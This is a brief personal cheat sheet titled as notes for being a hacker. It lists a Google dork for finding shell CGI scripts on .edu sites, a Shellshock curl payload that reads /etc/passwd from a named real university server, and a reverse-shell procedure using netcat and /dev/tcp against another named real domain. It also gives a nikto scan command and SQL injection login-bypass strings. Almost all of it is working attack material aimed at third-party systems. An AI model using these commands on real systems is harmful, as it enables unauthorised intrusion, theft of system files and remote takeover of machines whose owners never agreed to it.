A notes for being a hacker
更多文章
Scanning the target with Google
inurl:cgi-bin filetype:sh site:edu inurl:/cgi-bin/ ext:sh
Attempt to get the username remotely
curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/cat /etc/passwd " http://www.physics.csbsju.edu/cgi-bin/stats/dir.sh
Reverse SHELL
> php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c ls
if it response as 'Command sent to the server!', continue with the follows
> nc -lp 4444 -vv Waiting untill the PHP command is completed. If all goes well, you can issue any commands here.
Open another terminal. issue the command
> php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/here.is.my.IP/4444 0>&1"
cd /pentest/web/nikto perl nikto.pl -host 123.123.123.123
Checking if the Login form with SQL Injection
// Username admin' -- admin' # admin'/* // Password ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1-- ') or ('1'='1--